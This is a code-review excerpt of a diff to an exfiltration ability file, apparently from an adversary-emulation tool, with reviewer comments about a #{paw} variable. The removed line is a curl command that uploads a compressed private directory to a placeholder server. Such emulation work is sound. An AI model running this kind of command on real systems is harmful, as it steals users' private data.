data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml

```diff
@@ -11,13 +11,17 @@
     darwin:
       sh:
         command: |
-          curl -F "data=@#{host.dir.compress.private}" #{server}/file/upload
+          REQUESTID=$(uuidgen);
+          echo $REQUESTID;
```

Comment:
not sure if you've heard... but we're just getting ready to add a new #{paw} global variable that this would be perfect for... we should remove the echo and use that instead...

Reply:
yea... yea... but it's not in the code base yet. Approve the paw change so I can put this in the way it should be yo